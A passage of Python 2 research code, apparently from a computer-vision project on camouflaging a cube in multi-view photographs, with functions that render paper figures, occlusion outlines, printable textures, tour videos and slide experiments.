'walden-tree1' : 9,
'mit-12' : 19,
'mit-21' : 8,
'charlottesville-6' : 6,
'walden-log' : 6,
'charlottesville-2' : 8,
'charlottesville-9' : 6,
'charlottesville-1' : 7,
'disrupt-6' : 0,
'mit-20' : 3,
'mit-14': 13,
'walden-tree3' : 0,
'mit-6' : 6,
'mit-1' : 8,
'mit-5' : 16,
'couch3-real' : 6,
'bookshelf-real' : 3,
'charlottesville-7' : 9,
'mit-26' : 8,
'mit-28' : 13,
'mit-13' : 7,
'disrupt-11' : 7,
'couch5-real' : 2,
'walden-brush2' : 0,
'mit-9' : 0,
'mit-27' : 0,
'charlottesville-3' : 1,
'mit-37' : 4,
'mit-16' : 13,
}
out_base = '../results/scene-fig'
#assert not os.path.exists(out_base)
ut.mkdir(out_base)
scene_acc = ut.load(STATS_PATH)
scenes_by_easiness = sorted(scenes, key = lambda x : -np.mean(scene_acc[x, idx_from_alg(method)]))
for si, scene in enumerate(scenes_by_easiness):
print scene, np.mean(scene_acc[scene, idx_from_alg(method)])
# easier than deriving the image number from the output files
scan = dset.Scan(path_from_scene(scene))
texel_colors = ut.load(ut.pjoin(make_path('noloo', method, scene), 'data.pk'))['ret'][0]
frame = frame_choices[scene]
#out_path = ut.pjoin(out_base, 'scene-%d.pdf' % (1+si))
out_path = ut.pjoin(out_base, 'scene-%d.png' % (1+si))
#assert not os.path.exists(out_path)
mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))
ig.save(out_path, mesh.render(scan, frame, texel_colors))
def make_multiview_fig(n = None):
method = 'occlusion-wide'
scene_choices = ['mit-1', 'charlottesville-1', 'disrupt-11']
frame_choices = {'mit-1' : [0, 3, 7, 10], 'charlottesville-1' : [0, 2, 5, 8], 'disrupt-11' : [0, 4, 7, 10]}
out_base = '../results/multiview-fig'
#assert not os.path.exists(out_base)
ut.mkdir(out_base)
for si, scene in enumerate(scene_choices[:n]):
scan = dset.Scan(path_from_scene(scene))
mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))
frames = frame_choices[scene]
for fi, frame in enumerate(frames):
out_path = ut.pjoin(out_base, 'scene-%d-%d.png' % (1+si, 1+fi))
#assert not os.path.exists(out_path)
texel_colors = ut.load(ut.pjoin(make_path('noloo', method, scene), 'data.pk'))['ret'][0]
#ig.save(out_path, mesh.render(scan, frame, texel_colors))
#ig.save(out_path, render_cube(scan.path, mesh, texel_colors, frame, 200, outline = True, frame_using_cube = True))
if scene == 'mit-1':
occ_thresh = 1.25#1.8
else:
occ_thresh = None
if scene == 'charlottesville-1':
occ_thresh = 2.5
d_sc = 1.2
else:
d_sc = 1.
ig.save(out_path, render_cube(scan.path, mesh, texel_colors, frame, 200, outline = True, frame_using_cube = True, occ_thresh = occ_thresh, dim_sc = d_sc))
# def dilate_occ(scan, mesh, frame):
# occ = camo.occlusion_texels(scan, mesh, frame, thresh = 1.5, only_border = True)
# as_juv = mesh.index_as_juv(occ).copy()
# for j in xrange(as_juv.shape[0]):
# #dist, ind = scipy.ndimage.distance_transform_edt(1 - as_juv[j], return_indices = True)
# if np.any(as_juv[j]):
# dist, ind = scipy.ndimage.distance_transform_bf(1 - as_juv[j], metric = 'taxicab', return_indices = True)
# dist[ind[0] < 0] = 1e10
# as_juv[j, dist <= 10] = True
# return np.logical_and(mesh.texel_visible(scan, frame), mesh.index_as_flat(as_juv))
def clean_occ(scan, mesh, frame):
occ = camo.occlusion_texels(scan, mesh, frame, thresh = 1.5, only_border = True)
as_juv = mesh.index_as_juv(occ).copy()
for j in xrange(as_juv.shape[0]):
w, h = as_juv.shape[1:]
for u, v in [(0, range(h)),
(range(w), 0),
(range(w), -1),
(-1, range(h))]:
as_juv[j, u, v] = (np.mean(as_juv[j, u, v]) >= 0.5)
#dist, ind = scipy.ndimage.distance_transform_edt(1 - as_juv[j], return_indices = True)
# if np.any(as_juv[j]):
# dist, ind = scipy.ndimage.distance_transform_bf(1 - as_juv[j], metric = 'taxicab', return_indices = True)
# dist[ind[0] < 0] = 1e10
# as_juv[j, dist <= 10] = True
return np.logical_and(mesh.texel_visible(scan, frame), mesh.index_as_flat(as_juv))
def scan_fullres(fr, path):
if fr:
return dset.Scan(path, max_dim = None)
else:
return dset.Scan(path)
def occlusion_mask(scan, mesh, frame, thresh = 2., outline = False):
mask = box.mask(scan, mesh, frame)
#D = scipy.ndimage.distance_transform_edt(mask)
D = scipy.ndimage.distance_transform_edt(mask)
return D <= thresh, D
#return np.logical_and(mask, D <= thresh)
def mark_occlusion_texels(tc, scan, mesh, frame, thresh, mesh_occ_mask = None, p = 1):
tc = tc.copy()
mask = box.mask(scan, mesh, frame)
if mesh_occ_mask is not None:
mask = (mask & -mesh_occ_mask)
D = scipy.ndimage.distance_transform_edt(mask)
#occ_mask = np.array(occlusion_mask(scan, mesh, frame, thresh = thresh), 'd')
occ_mask = np.array(D, 'd')
vis = mesh.texel_visible(scan, frame)
proj = scan.project(frame, mesh.texel_pts)
proj = np.array(np.round(proj), 'l')
occ = np.zeros(mesh.ntexels, 'd')
occ[vis] = occ_mask[proj[vis, 1], proj[vis, 0]]
w = np.zeros_like(occ)
w[occ < thresh] = p#1
# scale the texels that are not totally on the boundary
ok = (thresh <= occ) & (occ < 1+thresh)
# anti-alias and (optionally) weight
w[ok] = p*((1+thresh) - occ[ok])
assert np.all((0 <= w) & (w <= 1))
tc = tc*(1-w[:, np.newaxis]) + 255*w[:, np.newaxis]
return tc
def render_cube(scene, mesh, texel_colors, frame, crop_size, fullres = False, outline = False,
frame_using_cube = False, occ_thresh = None, draw_boundaries = False, im = None, use_fr = True, dim_sc = 1., show_cube = True):
scan = scan_fullres(fullres, scene)
if im is None:
im_input = scan.im(frame)
else:
im_input = im
tc = texel_colors.copy()
mask = box.mask(scan, mesh, frame)
ys, xs = np.nonzero(mask)
cx, cy = map(int, np.mean(np.array([xs, ys]), axis = 1))
if frame_using_cube:
box_rect = ut.bbox2d(np.array([xs, ys]).T)
d = int(round(dim_sc * min(4*max(box_rect[2:]), min(scan.im(0).shape[:2]) - 1)))
rect = ut.rect_centered_at(cx, cy, d, d)
rect = ut.shift_in_bounds(scan.im(0).shape, rect)
scale = float(crop_size)/rect[2]
print box_rect, rect, scale
else:
rect = None
scale = 1.
# if not show_cube:
# im = scan.im(frame)
# rect = ut.rect_centered_at(cx, cy, crop_size, crop_size)
# crop_size /= scan_fullres(False, scan.path).scale
# return ig.sub_img(im, ut.rect_im_intersect(im, rect))
if outline:
if rect is not None:
assert rect[2] == rect[3]
#scan_fr = scan_fullres(True, scene)
scan_fr = scan_fullres(use_fr, scene)
print 'scale', scale
if occ_thresh is None:
occ_thresh = 2.
occ_thresh /= scale
# occ = camo.occlusion_texels(scan_fr, mesh, frame, thresh = occ_thresh, only_border = False)
# tc[occ] = 255
tc = mark_occlusion_texels(tc, scan_fr, mesh, frame, thresh = occ_thresh)
im_up = ig.resize(im_input, scan_fr.im(frame).shape)
#im = ig.resize(mesh.render(scan_fr, frame, tc, im = im_up), scan.im(frame).shape)
im_fr = mesh.render(scan_fr, frame, tc, im = im_up)
im = ig.resize(im_fr, scan.im(frame).shape)
if not show_cube:
im = scan.im(frame)
#ig.show([im_fr, im])
#assert im.shape[0] == im.shape[1]
else:
if show_cube:
im = mesh.render(scan, frame, tc)
else:
im = scan.im(frame)
if rect is not None:
if draw_boundaries:
return ig.draw_rects(im, [rect])
else:
return ig.sub_img(im, rect)
if fullres:
crop_size /= scan_fullres(False, scan.path).scale
#sc = (crop_size/2.)/float(box_rect[2])
elif crop_size is None:
return im
else:
rect = ut.rect_centered_at(cx, cy, crop_size, crop_size)
return ig.sub_img(im, ut.rect_im_intersect(im, rect))
def make_real_cube():
scene = 'bookshelf-real'
method = 'interior-wide'
scan = dset.Scan(path_from_scene(scene))
#texel_colors = camo.to_color_space_2d(ut.load(ut.pjoin(make_path('noloo', method, scene), 'data.pk'))['ret'][0])
if 0:
print 'hires'
mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'), texsize = 512)
scan = dset.Scan(path_from_scene(scene), max_dim = 2000)
texel_colors = camo.camo(scan, mesh, ut.Struct(method = 'interior-wide'))
ut.save('../results/real-interior.pk', texel_colors)
ut.toplevel_locals()
elif 1:
# upgrade to larger texel size; bigger images
texel_colors0, results0, labels0 = ut.load(ut.pjoin(make_path('noloo', method, scene), 'data.pk'))['ret'][:3]
mesh0 = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'), texsize = 256)
texsize = 1024
mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'), texsize = texsize)
geom = camo.Geom(scan, mesh)
scan = dset.Scan(path_from_scene(scene), max_dim = 2000)
label_color, label_valid = camo.label_colors(scan, mesh, geom, labels0, invisible_colors = True)
as_juv0 = mesh0.index_as_juv(results0).copy()
as_juv1 = mesh.index_as_juv(np.zeros(mesh.ntexels)).copy()
for j in xrange(as_juv0.shape[0]):
as_juv1[j] = ig.resize(as_juv0[j], as_juv1[j].shape[:2], order = 0, hires = False)
results1 = np.array(mesh.index_as_flat(as_juv1), 'l')
texel_colors = camo.from_color_space_2d(label_color[range(len(results1)), results1])
#texel_colors = label_color[range(len(results1)), results1]
ut.toplevel_locals()
elif 0:
texel_colors = ut.load('../results/real-interior.pk')[0]
mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'), texsize = 512)
else:
mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))
texel_colors = ut.load(ut.pjoin(make_path('noloo', method, scene), 'data.pk'))['ret'][0]
texel_colors = camo.to_color_space_2d(texel_colors)
texel_colors = mesh.index_as_juv(texel_colors)
out_path = '../results/real/colors.mat'
scipy.io.savemat(out_path, {'texel_colors' : texel_colors})
import matlab
matlab.matlab_cmd('/data/vision/billf/camo/camo', 'load_real_cube')
def make_printable_pattern(scene_path, mesh0, texel_colors0, results0, labels0, geom = None):
#texel_colors = camo.to_color_space_2d(ut.load(ut.pjoin(make_path('noloo', method, scene), 'data.pk'))['ret'][0])
# upgrade to larger texel size; bigger images
#texsize = 1024
texsize = 4096
#scan = dset.Scan(scene_path, max_dim = 2000)
scan = dset.Scan(scene_path, max_dim = None)
mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'), texsize = texsize)
as_juv0 = mesh0.index_as_juv(results0).copy()
as_juv1 = mesh.index_as_juv(np.zeros(mesh.ntexels)).copy()
for j in xrange(as_juv0.shape[0]):
as_juv1[j] = ig.resize(as_juv0[j], as_juv1[j].shape[:2], order = 0, hires = False)
results1 = np.array(mesh.index_as_flat(as_juv1), 'l')
labels = np.array(labels0, 'double')
labels[:, 1:] *= scan.scale/dset.Scan(scene_path).scale
print labels
texel_colors = np.zeros((mesh.ntexels, 3))
if geom is None:
geom = camo.Geom(scan, mesh)
print len(np.unique(results1))
for label in np.unique(results1):
print 'trying', label
label = int(label)
frame = int(labels[label, 0])
valid, colors = camo.project_texels(scan, frame, mesh, scan.im(frame), geom, labels[label, 1:])
ok = results1 == label
texel_colors[ok] = colors[ok]
#texel_colors = label_color[range(len(results1)), results1]
texel_colors_rgb = texel_colors.copy()
ut.toplevel_locals()
#texel_colors = camo.to_color_space_2d(texel_colors)
texel_colors = mesh.index_as_juv(texel_colors)
out_path = '../results/real/colors.mat'
scipy.io.savemat(out_path, {'texel_colors' : texel_colors, 'texel_colors_rgb' : texel_colors_rgb})
# import matlab
# matlab.matlab_cmd('/data/vision/billf/camo/camo', 'load_real_cube')
def make_rescomp_fig(n = None):
table = []
# index frames to be consistent w/ amt results
comparisons = [
('mit-20', 3, ['occlusion-wide', 'interior-wide']),
('disrupt-14', 4, ['occlusion-wide', 'random']),
('disrupt-14', 5, ['occlusion-wide', 'random']),
('disrupt-14', 3, ['occlusion-wide', 'random']),
]
#scene_acc = ut.load(STATS_PATH)
#out_dir = '../results/qual-compare'
out_dir = '../results/qual-compare2'
ut.mkdir(out_dir)
num = 0
for scene, loo_idx, methods in comparisons:
scan = scan_fullres(False, path_from_scene(scene))
mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))
table.append([])
for method in methods:
data = ut.load(ut.pjoin(make_path('loo', method, scene), 'data_%03d.pk' % loo_idx))
texel_colors = data['ret'][0]
loo_frame = scan.idx.index(data['pr'].loo_frame_idx)
im = render_cube(scan.path, mesh, texel_colors, loo_frame, 200, outline = True, frame_using_cube = True)
assert im.shape[0] == im.shape[1]
table[-1] += [method, im]
#table[-1] += [method, render_cube(scan.path, mesh, texel_colors, loo_frame, 200, outline = False)]
ig.save(ut.pjoin(out_dir, 'result-%03d.pdf' % num), im)
ig.save(ut.pjoin(out_dir, 'result-%03d.png' % num), im)
num += 1
ig.show(table)
def count_ims():
total = 0
for scene in ALL_SCENES:
path = make_path('loo', 'interior-wide', scene)
nims = len(glob.glob(path + '/result_*.jpg'))
total += nims
print scene, nims
print 'total images', total, 'scenes', len(ALL_SCENES)
def draw_grid(im, proj, spacing = [-1, 0, 1]):
d = 30.
for x in spacing:
for y in spacing:
if x < 1:
im = ig.draw_lines(im, [proj + d*np.array([x, y])], [proj + d*np.array([x+1, y])], colors = (255, 255, 255))
if y < 1:
im = ig.draw_lines(im, [proj + d*np.array([x, y])], [proj + d*np.array([x, y+1])], colors = (255, 255, 255))
return im
def make_project_fig():
#scene = 'mit-35'
scene = 'mit-37'
path = make_path('noloo', 'interior-wide', scene)
#texel_colors = ut.load(ut.pjoin(path, 'data.pk'))['ret'][0]
scan = dset.Scan(path_from_scene(scene))
mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))
scan = dset.Scan(path_from_scene(scene))
frames = range(scan.length)#[scan.length-1] #range(scan.length)[:1]
geom = camo.Geom(scan, mesh)
#texel = mesh.juv2tex[5, 128, 128]
texel = mesh.juv2tex[2, 128, 128]
table = []
for frame in frames:
proj = scan.project(frame, mesh.texel_pts[texel])
im_grid = draw_grid(scan.im(frame), proj)
label_valid, self_colors = camo.project_texels(scan, frame, mesh, im_grid, geom)
im = render_cube(scan.path, mesh, self_colors, frame, 200, fullres = False, outline = True, frame_using_cube = True, occ_thresh = 2., draw_boundaries = True, im = im_grid, use_fr = False)
table.append([im, scan.im(frame)])
#table.append(ig.draw_pts(im, proj))
ig.show(table)
def find_best_algs():
with ut.constant_seed():
scene_acc = ut.load(STATS_PATH)
for scene in ALL_SCENES:
algs = ['greedy', 'interior-wide', 'occlusion-wide']
acc = [np.mean(scene_acc[scene, idx_from_alg(alg)]) for alg in algs]
i = np.argmin(acc)
#print scene, algs[i], acc
yield scene, algs[i]
def label_plane(seq, root = 0, y_flip = True):
scan = dset.Scan(seq, None)
_, _, tracks = dset.read_bundler(scan.bundle_file, scan.full_shape)
pts = np.array([t[0] for t in tracks])
proj = scan.project(root, pts)
pylab.clf()
im_with_pts = ig.draw_pts(scan.im(root), proj, width = 2)
pylab.imshow(im_with_pts)
rect = ut.bbox2d(pylab.ginput(2, timeout = -1))
#rect = (1782.005828476269, 1431.7364696086595, 529.75936719400488, 354.40549542048279)
print rect
ok = ut.land(rect[0] <= proj[:, 0], proj[:, 0] <= rect[0] + rect[2], rect[1] <= proj[:, 1], proj[:, 1] <= rect[1] + rect[3])
pts_in_box = pts[ok]
thresh = pylab.dist(scan.center(root), scan.center(root+1))/50.
plane, _ = planefit.fit_plane_ransac(pts_in_box, thresh)
if plane[1] < 0 and y_flip:
plane *= -1
ins = planefit.plane_inliers(plane, pts, thresh)
pylab.clf()
colors = np.zeros_like(pts)
colors[:, 0] = 255
colors[ins] = (0, 255, 0)
im_ins = ig.draw_pts(scan.im(root), map(ut.itup, proj), map(ut.itup, colors), width = 2)
pylab.clf()
pylab.imshow(im_ins)
print plane
return plane
video_order = ['charlottesville-3', 'bookshelf-real', 'disrupt-11', 'mit-14', 'walden-brush2', 'walden-log', \
'disrupt-8', 'charlottesville-1', 'mit-13', 'disrupt-6']
def test_warp(par = 0, start = 0, end = None):
#scenes = ['bookshelf-real']#['couch3-real', 'bookshelf-real', 'disrupt-11', 'patio2-real', 'mit-1', 'disrupt-8', 'charlottesville-2']
# 5: side
# 4: usually side
# 3: usually side
# 2: usually side
# 1: usually top
# 0: usually bottom
# np.array([-0.9286861 , 0.13738529, -0.34448136, -3.96361632])
scenes = [('disrupt-11', 0, 1, [], []),
('charlottesville-2', 0, 1, [], [(8, 9)]),
('mit-27', 0, 1, [np.array([ -9.06738777e-01, 2.58900135e-03, 4.21684821e-01, 2.93683015e+00])], []),
('disrupt-6', 0, 1, [np.array([ 0.85136312, 0.18874681, -0.48944405, -1.52800028])], []),
('couch3-real', 0, 1, [np.array([-0.60995728, 0.15168697, -0.77778094, -0.88194374])], []),
('couch5-real', 2, 1, [], []),
('disrupt-8', 0, 1, [np.array([-0.92784247, 0.1387372 , -0.34620851, -3.97233358])], []),
('mit-13', 0, -1, [], []),
('mit-20', 0, -1, [], []),
('bookshelf-real', 3, -1, [], [])]
# ('disrupt-6', 0, 1, [], [np.array([ 0.85139516, 0.190946 , -0.48853444, -1.52601666])]),
for x in ALL_SCENES:
if x not in map(ut.fst, scenes):
scenes.append((x, 0, 1, [], []))
#print scenes
#scenes = scenes[start:end]
scenes = sorted(scenes, key = lambda x : (len(video_order) if x[0] not in video_order else video_order.index(x[0]), x[0]))
scenes = scenes[start:end]
ip.reset(par)
scene_alg = dict(find_best_algs())
#scene_names = [y[0] for y in scenes]
for scene, plane_idx, order, other_planes, bad_pairs in scenes:
#texel_colors = ut.load(ut.pjoin(make_path('noloo', 'interior-wide', scene), 'data.pk'))['ret'][0]
alg = 'random' #scene_alg[scene]
texel_colors = ut.load(ut.pjoin(make_path('noloo', alg, scene), 'data.pk'))['ret'][0]
scan = dset.Scan(ut.pjoin('../data/', scene))
mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))
#tour.tour(scan, mesh, texel_colors, [0, 1, 2, 3], par = par)
if 0:
if order == 1:
frames = range(scan.length)
else:
frames = list(reversed(range(scan.length)))
else:
frames = sorted(set(map(int, np.linspace(0, scan.length-1, 6))))
if order != 1:
frames = list(reversed(frames))
#print 'before mem usage'
#ut.mem_usage()
print scene, alg
# url = tour.tour(scan, mesh, texel_colors, frames, plane_idx = plane_idx,
# other_planes = other_planes, bad_pairs = bad_pairs,
# outline_start = 0, outline_end = 1, start_wo_outline = True, par = par)
#url = tour.tour(scan, mesh, texel_colors, frames, plane_idx = plane_idx, other_planes = other_planes, bad_pairs = bad_pairs, outline_start = scan.length/2, par = par)
url = tour.tour(scan, mesh, texel_colors, frames, plane_idx = plane_idx, other_planes = other_planes, bad_pairs = bad_pairs, par = par)
f = open('../results/vid-list', 'a')
print >>f, scene, alg, url
f.close()
#print other_planes
#url = tour.tour(scan, mesh, texel_colors, [scan.length-2, scan.length-1], n = 5, plane_idx = plane_idx, other_planes = other_planes, par = par)
#print 'after mem usage'
#ut.mem_usage()
def make_warps():
for i in xrange(len(ALL_SCENES)):
os.system('python -c "import figures; figures.test_warp(par = 1, start = %d, end = %d+1)"' % (i, i))
def collect_warps():
urls = [x.split() for x in ut.lines('../results/vid-results')]
base = '/data/vision/billf/aho-billf/www/tab'
out = ut.make_temp_dir(dir = base)
f = open(ut.pjoin(out, 'index.html'), 'w')
for _, _, url in urls:
last = url.split('/')[-1]
path = os.path.join(base, last)
page_in = open(ut.pjoin(path, 'index.html'), 'r')
f.write(page_in.read() + '\n')
for y in glob.glob(path + '/*.mp4'):
os.system('ln -s %s %s/' % (y, out))
f.close()
os.system('chmod -R a+rwx %s' % out)
print ut.pjoin(imtable.PUBLIC_URL, out.split('/')[-1])
class MeshOcc:
def __init__(self, scan, mask_path = None):
self.scan = scan
self.path = mask_path
def mask(self, frame):
if self.path is None:
return np.zeros(self.scan.im(frame).shape[:2])
else:
fname = os.path.join(self.path, 'masked%d.png'% (frame+1))
if os.path.exists(fname):
mask = np.all(ig.load(fname) == (255, 0, 255), axis = 2)
mask = 255*np.array(mask, 'd')
mask = ig.resize(mask, self.scan.scale, hires = 1)/255.
return mask
else:
return np.zeros(self.scan.im(frame).shape[:2])
def apply_mask(self, im_mesh, im_nomesh, mask):
return im_mesh*(1.-mask[:,:,np.newaxis]) + im_nomesh*mask[:,:,np.newaxis]
def make_videos():
# order = ['charlottesville-3', 'bookshelf-real', 'disrupt-11', 'mit-14', 'walden-brush2', 'mit-27', 'mit-1', 'walden-log', \
# 'mit-5', 'charlottesville-1', 'couch3-real', 'disrupt-6', 'disrupt-8', 'mit-13']
print 'tmp'
video_order = ['charlottesville-3', 'bookshelf-real', 'disrupt-11', 'mit-14', 'walden-log', \
'disrupt-8', 'charlottesville-1', 'mit-13', 'disrupt-6']
vids = []
#urls = dict([(x.split()[0], x.split()[1:]) for x in ut.lines('../results/vid-results')])
urls = dict([(x.split()[0], x.split()[1:]) for x in ut.lines('../results/vid-list')])
base = '/data/vision/billf/aho-billf/www/tab'
for scene in video_order:
alg, url = urls[scene]
print 'alg', alg
last = url.split('/')[-1]
path = os.path.join(base, last)
vids.append(glob.glob(path + '/*.mp4')[0])
print '\n'.join(vids)
ut.write_lines('../results/ffmpeg-vid-list', ['file %s' % s for s in vids])
os.system('ffmpeg -f concat -i ../results/ffmpeg-vid-list -c copy /data/vision/billf/aho-billf/www/camo-vid.mp4')
def make_nondetect_slide(todo, par = False):
ip.reset(par)
scene = 'bookshelf-real'
#scan = dset.Scan(ut.pjoin('../data/', scene))
#scan = dset.Scan(ut.pjoin('../data/', scene), max_dim = 500.)
scan = dset.Scan(ut.pjoin('../data/', scene))
mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))
frame = 6
# fix the mesh
lf = frame-1
if 'move' in todo:
# front
plane1 = mesh.face_planes[5]
# side
plane2 = mesh.face_planes[4]
pt1 = mesh.mesh_pts[mesh.face_idx[lf][0]]
pt2 = mesh.mesh_pts[mesh.face_idx[lf][1]]
table = []
# for d in np.linspace(0.8, 0.9, 5):
# for d2 in np.linspace(0.05, 0.5, 5):
for d in [0.85]:
for d2 in [1-0.85]:
#for d3 in [0.1, 0.11, 0.12, 0.15]:
for d3 in [0.15]:
for d4 in [0, 0.025, 0.05, 0.1]:
if 1:
bottom = 1
top = 0
mesh_pts = mesh.mesh_pts.copy()
for i in xrange(scan.length):
if i in (top, bottom):
pts = mesh.mesh_pts[mesh.face_idx[i]].copy()
c = np.mean(pts, axis = 0)
mesh_pts[mesh.face_idx[i]] = c + d*(pts - c)
if i == top:
mesh_pts[mesh.face_idx[i]] -= d2*pylab.dist(pt1, pt2)*mesh.face_planes[i][:3]
#mesh2 = box.Mesh(mesh.face_idx, mesh_pts)
#mesh2 = box.Mesh(mesh.face_idx, mesh_pts - plane[:3]*0.07*pylab.dist(pt1, pt2))
mesh2 = box.Mesh(mesh.face_idx, mesh_pts - plane1[:3]*d3*pylab.dist(pt1, pt2))
mesh2 = box.Mesh(mesh.face_idx, mesh_pts - plane2[:3]*d4*pylab.dist(pt1, pt2))
table.append([d, d2, d3, d4] + [box.draw_faces(mesh2, scan, i) for i in scan.frames])
ig.show(table)
#frame = 3
#lf = 1
lf = frame-1
d = np.linalg.norm(scan.center(lf) - scan.center(lf-1))
pt = scan.center(lf) + 1.05*d*np.array([0., 1., 0]) #0.1*mesh.face_planes[-1][:3]*d
im = scan.im(lf)
#VDIR = mvg.ray_dirs(scan.K(lf), im.shape, scan.R(lf))[im.shape[0]/2, im.shape[1]/2]
texel_colors = np.zeros((mesh.ntexels, 3))
for face in xrange(6):
print np.abs(np.dot(ut.normalized(-mesh.face_center[face] + pt), ut.normalized(mesh.face_planes[face][:3])))
texel_colors[mesh.tex2juv[:, 0] == face] = 255*np.abs(np.dot(ut.normalized(-mesh.face_center[face] + pt),
ut.normalized(mesh.face_planes[face][:3])))
#texel_colors *= 225/float(np.max(texel_colors))
texel_colors *= 255/float(np.max(texel_colors))
lighting_colors = texel_colors.copy()
ut.save('../results/bookshelf-lighting.pk', lighting_colors)
mesh_occ = MeshOcc(scan, '../results/bookshelf-masks')
def mesh_render(*args, **kwargs):
kwargs['mask'] = mesh_occ.mask(args[1])
return mesh.render(*args, **kwargs)
if 'lighting' in todo:
ig.show([[mesh_render(scan, f, texel_colors), scan.im_with_real(f)] for f in range(scan.length)])
geom = camo.Geom(scan, mesh)
if 'random' in todo:
#for other_frame in xrange(scan.length):
table = []
for frame1 in scan.frames:
_, texel_colors = camo.project_texels(scan, frame1, mesh, scan.im(frame1), geom)
table.append([])
for frame2 in scan.frames:
table[-1] += [frame1, frame2, mesh_render(scan, frame2, texel_colors)]
ig.show(table)
if 'tour-random' in todo:
#frames = [6, 0]
#frames = [6, 2]
frames = [6, 3]
valid, proj_colors = camo.project_texels(scan, frames[0], mesh, scan.im(frames[0]), geom)
texel_colors = lighting_colors.copy()
texel_colors[valid] = proj_colors[valid]
tour.tour(scan, mesh, texel_colors, frames, plane_idx = 3, par = par)
if 'distortion-real' in todo:
src_frame = 2
view_frame = 1
face = 2
scan_tour = dset.Scan(ut.pjoin('../data/', scene))
colors = lighting_colors.copy()
colors[:] = 200
colors[mesh.tex2juv[:, :, 0] == face] = (0, 128, 0)
table = []
valid, proj_colors = camo.project_texels(scan_tour, src_frame, mesh, scan_tour.im(src_frame), geom)
colors[valid] = proj_colors
table.append(mesh_render(scan_tour, view_frame, colors))
ig.show(table)
if 'distortion-synthetic' in todo:
proj_frame = 2
view_frame = 1
im = scan.im(proj_frame).copy()
mask = box.mask(scan, mesh, proj_frame)
#pattern = ig.load('/data/vision/billf/camo/camo/nondetect/results/textures/zebra-stripes-vector/zebra-stripes.png')
#pattern = ig.load('/data/vision/billf/camo/camo/nondetect/results/textures/checkers/Checkerboard_pattern.png')
pattern = ig.load('/data/vision/billf/camo/camo/nondetect/results/textures/checkers/Checkerboard_pattern.jpg')
#pattern = pattern.transpose([1, 0, 2])
ys, xs = np.nonzero(mask)
rect = ut.bbox2d(zip(xs, ys))
s = 1.02*max(float(rect[3]) / pattern.shape[0], float(rect[2]) / pattern.shape[1])
pattern = ig.resize(pattern, s)
cx, cy = map(int, np.mean(np.array([xs, ys]), axis = 1))
ig.sub_img(im, ut.rect_centered_at(cx, cy, pattern.shape[1], pattern.shape[0]))[:] = pattern
_, texel_colors = camo.project_texels(scan, proj_frame, mesh, im, geom)
texel_colors = texel_colors * np.array(lighting_colors, 'd')/255.
table = []
# table.append(mesh_render(scan, view_frame, texel_colors, im = 255+np.zeros_like(im)))
# table.append(mesh_render(scan, proj_frame, texel_colors, im = 255+np.zeros_like(im)))
table.append(mesh_render(scan, view_frame, texel_colors))
table.append(mesh_render(scan, proj_frame, texel_colors))
ig.show(table)
if 'tour-cues' in todo:
#ntour = 5
ntour = 40
do_tours = False
#scan_tour = dset.Scan(ut.pjoin('../data/', scene), max_dim = 500.)
scan_tour = dset.Scan(ut.pjoin('../data/', scene))
frames = [6, 2]
valid, proj_colors = camo.project_texels(scan_tour, frames[0], mesh, scan_tour.im(frames[0]), geom)
texel_colors = 0.75*lighting_colors.copy()
texel_colors[valid] = proj_colors[valid]
print 'distortion and occlusion boundary cues'
if do_tours: tour.tour(scan_tour, mesh, texel_colors, frames, plane_idx = 3, im_wait = 1, n = ntour,
mesh_occ = mesh_occ, outline_start = 0, outline_end = 1, par = par)
table = []
# all
table.append(mesh_render(scan_tour, frames[-1], texel_colors))
sc = 0.4
im_dark = sc*scan_tour.im(frames[-1])
table.append(sc*mesh_render(scan_tour, frames[-1], texel_colors))
ig.show(table)
table.append(mesh_render(scan_tour, frames[-1], texel_colors, im = im_dark))
# distortion and occlusion
#for f in [0, 6]:#xrange(6):
for f in xrange(6):#xrange(6):
tc = texel_colors.copy()
tc[mesh.tex2juv[:, 0] != f] *= sc
table.append([f, mesh_render(scan_tour, frames[-1], tc, im = im_dark)])
ig.show(table)
print "what happens if we look at a view that wasn't covered?"
frames2 = [2, 0]
ig.show(mesh_render(scan_tour, frames[-1], tc, im = im_dark))
if do_tours: tour.tour(scan_tour, mesh, texel_colors, frames2, n = ntour, plane_idx = 3, im_wait = 1, par = par, mesh_occ = mesh_occ)
print 'we can fill it with something...'
other_frame = 1
valid2, proj_colors2 = camo.project_texels(scan_tour, other_frame, mesh, scan_tour.im(other_frame), geom)
texel_colors_filled = texel_colors.copy()
texel_colors_filled[(-valid) & valid2] = proj_colors2[-valid & valid2]
im_dark = sc*scan_tour.im(frames2[-1])
ig.show([mesh_render(scan_tour, frames2[-1], texel_colors_filled),
mesh_render(scan_tour, frames2[-1], texel_colors_filled, im = im_dark)])
ig.show([mesh_render(scan_tour, f, texel_colors_filled) for f in scan.frames])
#if do_tours: tour.tour(scan_tour, mesh, texel_colors, frames, plane_idx = 3, im_wait = 1, par = par)
if 'test-mask' in todo:
table = []
#scan = scan_fr = scan_fullres(True, scan.path)
for frame in scan.frames:
fname = '../results/bookshelf-masks/im%d-colored.png' % (frame+1)
if os.path.exists(fname):
mask = np.all(ig.load(fname) == (255, 0, 255), axis = 2)
mask = 255*np.array(mask, 'd')
mask = ig.resize(mask, scan.scale, hires = 1)/255.
#mask = np.array(ig.resize(np.array(mask, 'd'), scan.scale, order = 1, hires = 0))
#ig.show(mask)
im = box.draw_faces(mesh, scan, frame)
if 0:
im[mask] = scan.im(frame)[mask]
if 1:
im = im*(1.-mask[:,:,np.newaxis]) + mask[:,:,np.newaxis]*scan.im(frame)
table.append(im)
ig.show(table)
if 'mask' in todo:
scan_fr = scan_fullres(True, scan.path)
ig.show([[scan_fr.im(f), box.draw_faces(mesh, scan_fr, f)] for f in scan_fr.frames])
if 'zebra' in todo:
table = []
# for frame1 in scan.frames:
# for other_frame in scan.frames: #[scan.length-1]:
for frame1 in [6]:
for other_frame in [4]: #[scan.length-1]:
